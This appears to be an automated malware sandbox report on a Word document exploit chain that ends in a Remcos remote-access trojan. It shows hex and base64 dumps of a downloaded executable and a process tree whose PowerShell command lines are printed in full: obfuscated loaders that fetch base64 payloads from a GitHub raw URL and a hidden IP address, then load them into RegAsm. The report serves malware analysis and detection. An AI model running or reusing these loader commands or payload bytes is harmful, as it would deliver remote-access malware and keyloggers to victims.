                                                                                                                                X-Cache-Hits: 0
                                                                                                                                X-Timer: S1727767527.093306,VS0,VE62
                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                X-Fastly-Request-ID: ad9fec078881041da13a71528738b5c3e7efe8e0
                                                                                                                                Expires: Tue, 01 Oct 2024 07:30:27 GMT
                                                                                                                                Source-Age: 0
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                                                Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                                                Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                                                Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                                                Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                                                Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                                                Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                                                Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                                                Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                                                Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:03:25:03
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                Imagebase:0x13f920000
                                                                                                                                File size:1'423'704 bytes
                                                                                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:8
                                                                                                                                Start time:03:25:20
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:543'304 bytes
                                                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:03:25:22
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS"
                                                                                                                                Imagebase:0x280000
                                                                                                                                File size:141'824 bytes
                                                                                                                                MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:03:25:22
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                Imagebase:0xf90000
                                                                                                                                File size:427'008 bytes
                                                                                                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:12
                                                                                                                                Start time:03:25:23
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"
                                                                                                                                Imagebase:0xf90000
                                                                                                                                File size:427'008 bytes
                                                                                                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:13
                                                                                                                                Start time:03:25:29
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:14
                                                                                                                                Start time:03:25:36
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:15
                                                                                                                                Start time:03:25:36
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
